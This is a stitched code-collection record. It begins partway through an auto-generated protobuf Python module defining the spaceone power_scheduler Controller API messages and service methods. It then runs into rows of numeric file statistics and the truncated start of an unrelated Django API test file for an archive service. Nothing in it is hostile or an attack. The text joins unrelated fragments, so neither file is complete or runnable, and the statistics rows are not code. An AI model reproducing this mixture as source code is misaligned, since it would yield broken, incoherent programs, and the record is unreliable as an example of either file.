name='plugin_info', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.plugin_info', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.tags', index=3,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.domain_id', index=4,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=529,
serialized_end=715,
)
_CONTROLLERREQUEST = _descriptor.Descriptor(
name='ControllerRequest',
full_name='spaceone.api.power_scheduler.v1.ControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControllerRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerRequest.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=717,
serialized_end=778,
)
_GETCONTROLLERREQUEST = _descriptor.Descriptor(
name='GetControllerRequest',
full_name='spaceone.api.power_scheduler.v1.GetControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.GetControllerRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.GetControllerRequest.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='only', full_name='spaceone.api.power_scheduler.v1.GetControllerRequest.only', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=780,
serialized_end=858,
)
_CONTROLLERQUERY = _descriptor.Descriptor(
name='ControllerQuery',
full_name='spaceone.api.power_scheduler.v1.ControllerQuery',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='query', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.query', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.controller_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.domain_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=860,
serialized_end=977,
)
_CONTROLLERINFO = _descriptor.Descriptor(
name='ControllerInfo',
full_name='spaceone.api.power_scheduler.v1.ControllerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='provider', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.provider', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='capability', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.capability', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.plugin_info', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.tags', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.created_at', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.domain_id', index=7,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=980,
serialized_end=1240,
)
_CONTROLLERSINFO = _descriptor.Descriptor(
name='ControllersInfo',
full_name='spaceone.api.power_scheduler.v1.ControllersInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='results', full_name='spaceone.api.power_scheduler.v1.ControllersInfo.results', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_count', full_name='spaceone.api.power_scheduler.v1.ControllersInfo.total_count', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1242,
serialized_end=1346,
)
_CONTROLLERSTATQUERY = _descriptor.Descriptor(
name='ControllerStatQuery',
full_name='spaceone.api.power_scheduler.v1.ControllerStatQuery',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='query', full_name='spaceone.api.power_scheduler.v1.ControllerStatQuery.query', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerStatQuery.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1348,
serialized_end=1442,
)
_CONTROLREQUEST = _descriptor.Descriptor(
name='ControlRequest',
full_name='spaceone.api.power_scheduler.v1.ControlRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControlRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='filter', full_name='spaceone.api.power_scheduler.v1.ControlRequest.filter', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret_id', full_name='spaceone.api.power_scheduler.v1.ControlRequest.secret_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControlRequest.domain_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='use_cache', full_name='spaceone.api.power_scheduler.v1.ControlRequest.use_cache', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1445,
serialized_end=1582,
)
_UPDATEPLUGINREQUEST = _descriptor.Descriptor(
name='UpdatePluginRequest',
full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='options', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.options', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.domain_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1584,
serialized_end=1706,
)
_VERIFYPLUGINREQUEST = _descriptor.Descriptor(
name='VerifyPluginRequest',
full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret_id', full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest.secret_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest.domain_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1708,
serialized_end=1790,
)
_PLUGININFO.fields_by_name['options'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_PLUGININFO.fields_by_name['metadata'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CREATECONTROLLERREQUEST.fields_by_name['plugin_info'].message_type = _PLUGININFO
_CREATECONTROLLERREQUEST.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATECONTROLLERREQUEST.fields_by_name['plugin_info'].message_type = _PLUGININFO
_UPDATECONTROLLERREQUEST.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CONTROLLERQUERY.fields_by_name['query'].message_type = spaceone_dot_api_dot_core_dot_v1_dot_query__pb2._QUERY
_CONTROLLERINFO.fields_by_name['capability'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CONTROLLERINFO.fields_by_name['plugin_info'].message_type = _PLUGININFO
_CONTROLLERINFO.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CONTROLLERSINFO.fields_by_name['results'].message_type = _CONTROLLERINFO
_CONTROLLERSTATQUERY.fields_by_name['query'].message_type = spaceone_dot_api_dot_core_dot_v1_dot_query__pb2._STATISTICSQUERY
_CONTROLREQUEST.fields_by_name['filter'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATEPLUGINREQUEST.fields_by_name['options'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
DESCRIPTOR.message_types_by_name['PluginInfo'] = _PLUGININFO
DESCRIPTOR.message_types_by_name['CreateControllerRequest'] = _CREATECONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['UpdateControllerRequest'] = _UPDATECONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['ControllerRequest'] = _CONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['GetControllerRequest'] = _GETCONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['ControllerQuery'] = _CONTROLLERQUERY
DESCRIPTOR.message_types_by_name['ControllerInfo'] = _CONTROLLERINFO
DESCRIPTOR.message_types_by_name['ControllersInfo'] = _CONTROLLERSINFO
DESCRIPTOR.message_types_by_name['ControllerStatQuery'] = _CONTROLLERSTATQUERY
DESCRIPTOR.message_types_by_name['ControlRequest'] = _CONTROLREQUEST
DESCRIPTOR.message_types_by_name['UpdatePluginRequest'] = _UPDATEPLUGINREQUEST
DESCRIPTOR.message_types_by_name['VerifyPluginRequest'] = _VERIFYPLUGINREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PluginInfo = _reflection.GeneratedProtocolMessageType('PluginInfo', (_message.Message,), {
'DESCRIPTOR' : _PLUGININFO,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.PluginInfo)
})
_sym_db.RegisterMessage(PluginInfo)
CreateControllerRequest = _reflection.GeneratedProtocolMessageType('CreateControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATECONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.CreateControllerRequest)
})
_sym_db.RegisterMessage(CreateControllerRequest)
UpdateControllerRequest = _reflection.GeneratedProtocolMessageType('UpdateControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATECONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.UpdateControllerRequest)
})
_sym_db.RegisterMessage(UpdateControllerRequest)
ControllerRequest = _reflection.GeneratedProtocolMessageType('ControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerRequest)
})
_sym_db.RegisterMessage(ControllerRequest)
GetControllerRequest = _reflection.GeneratedProtocolMessageType('GetControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _GETCONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.GetControllerRequest)
})
_sym_db.RegisterMessage(GetControllerRequest)
ControllerQuery = _reflection.GeneratedProtocolMessageType('ControllerQuery', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERQUERY,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerQuery)
})
_sym_db.RegisterMessage(ControllerQuery)
ControllerInfo = _reflection.GeneratedProtocolMessageType('ControllerInfo', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERINFO,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerInfo)
})
_sym_db.RegisterMessage(ControllerInfo)
ControllersInfo = _reflection.GeneratedProtocolMessageType('ControllersInfo', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERSINFO,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllersInfo)
})
_sym_db.RegisterMessage(ControllersInfo)
ControllerStatQuery = _reflection.GeneratedProtocolMessageType('ControllerStatQuery', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERSTATQUERY,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerStatQuery)
})
_sym_db.RegisterMessage(ControllerStatQuery)
ControlRequest = _reflection.GeneratedProtocolMessageType('ControlRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTROLREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControlRequest)
})
_sym_db.RegisterMessage(ControlRequest)
UpdatePluginRequest = _reflection.GeneratedProtocolMessageType('UpdatePluginRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATEPLUGINREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.UpdatePluginRequest)
})
_sym_db.RegisterMessage(UpdatePluginRequest)
VerifyPluginRequest = _reflection.GeneratedProtocolMessageType('VerifyPluginRequest', (_message.Message,), {
'DESCRIPTOR' : _VERIFYPLUGINREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.VerifyPluginRequest)
})
_sym_db.RegisterMessage(VerifyPluginRequest)
_CONTROLLER = _descriptor.ServiceDescriptor(
name='Controller',
full_name='spaceone.api.power_scheduler.v1.Controller',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1793,
serialized_end=3274,
methods=[
_descriptor.MethodDescriptor(
name='create',
full_name='spaceone.api.power_scheduler.v1.Controller.create',
index=0,
containing_service=None,
input_type=_CREATECONTROLLERREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\002!\"\037/power-scheduler/v1/controllers',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='update',
full_name='spaceone.api.power_scheduler.v1.Controller.update',
index=1,
containing_service=None,
input_type=_UPDATECONTROLLERREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\0020\032./power-scheduler/v1/controller/{controller_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='delete',
full_name='spaceone.api.power_scheduler.v1.Controller.delete',
index=2,
containing_service=None,
input_type=_CONTROLLERREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\0020*./power-scheduler/v1/controller/{controller_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='get',
full_name='spaceone.api.power_scheduler.v1.Controller.get',
index=3,
containing_service=None,
input_type=_GETCONTROLLERREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\0020\022./power-scheduler/v1/controller/{controller_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='list',
full_name='spaceone.api.power_scheduler.v1.Controller.list',
index=4,
containing_service=None,
input_type=_CONTROLLERQUERY,
output_type=_CONTROLLERSINFO,
serialized_options=b'\202\323\344\223\002K\022\037/power-scheduler/v1/controllersZ(\"&/power-scheduler/v1/controllers/search',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='stat',
full_name='spaceone.api.power_scheduler.v1.Controller.stat',
index=5,
containing_service=None,
input_type=_CONTROLLERSTATQUERY,
output_type=google_dot_protobuf_dot_struct__pb2._STRUCT,
serialized_options=b'\202\323\344\223\002&\"$/power-scheduler/v1/controllers/stat',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='control',
full_name='spaceone.api.power_scheduler.v1.Controller.control',
index=6,
containing_service=None,
input_type=_CONTROLREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\0028\"6/power-scheduler/v1/controller/{controller_id}/control',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='update_plugin',
full_name='spaceone.api.power_scheduler.v1.Controller.update_plugin',
index=7,
containing_service=None,
input_type=_UPDATEPLUGINREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\0027\0325/power-scheduler/v1/controller/{controller_id}/plugin',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='verify_plugin',
full_name='spaceone.api.power_scheduler.v1.Controller.verify_plugin',
index=8,
containing_service=None,
input_type=_VERIFYPLUGINREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\002>\"</power-scheduler/v1/controller/{controller_id}/plugin/verify',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CONTROLLER)
DESCRIPTOR.services_by_name['Controller'] = _CONTROLLER
# @@protoc_insertion_point(module_scope)
| 49.440409
| 4,807
| 0.771862
| 5,577
| 43,557
| 5.706652
| 0.053254
| 0.038459
| 0.068372
| 0.069252
| 0.808804
| 0.77776
| 0.750833
| 0.729969
| 0.65569
| 0.625369
| 0
| 0.040463
| 0.105218
| 43,557
| 880
| 4,808
| 49.496591
| 0.776133
| 0.029869
| 0
| 0.675277
| 1
| 0.01353
| 0.244353
| 0.206516
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00984
| 0
| 0.00984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cd8a733f49a217cb81062ae5fe269d19890f3a1
| 65,641
|
py
|
Python
|
archive_api/tests/test_api.py
|
NGEET/ngt-archive
|
978b26b7617b5c465046121838c000c4c46022f4
|
[
"BSD-3-Clause-LBNL"
] | 10
|
2017-04-15T14:43:22.000Z
|
2021-05-06T21:56:42.000Z
|
archive_api/tests/test_api.py
|
NGEET/ngt-archive
|
978b26b7617b5c465046121838c000c4c46022f4
|
[
"BSD-3-Clause-LBNL"
] | 53
|
2017-06-13T20:45:26.000Z
|
2022-03-24T17:39:19.000Z
|
archive_api/tests/test_api.py
|
NGEET/ngt-archive
|
978b26b7617b5c465046121838c000c4c46022f4
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2017-06-16T17:34:15.000Z
|
2021-03-30T17:35:10.000Z
|
from __future__ import print_function, unicode_literals
import json
from unittest import mock
from unittest.mock import PropertyMock
import os
import shutil
from django.contrib.auth.models import User
from django.core import mail
from django.test import Client
from django.test import override_settings
from os.path import dirname
from rest_framework import status
from rest_framework.test import APITestCase
from archive_api.models import DataSetDownloadLog, DataSet
from ngt_archive import settings
# Mock methods
def get_max_size(size):
""" Return a get_size method for the size given"""
def get_size():
return size
return get_size()
class ApiRootClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def setUp(self):
self.client = Client()
user = User.objects.get(username="auser")
self.client.force_login(user)
def test_client_get_root(self):
response = self.client.get('/api/v1/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"datasets": "http://testserver/api/v1/datasets/",
"sites": "http://testserver/api/v1/sites/",
"variables": "http://testserver/api/v1/variables/",
"people": "http://testserver/api/v1/people/",
"plots": "http://testserver/api/v1/plots/"})
@override_settings(EMAIL_NGEET_TEAM='ngeet-team@testserver',
EMAIL_SUBJECT_PREFIX='[ngt-archive-test]')
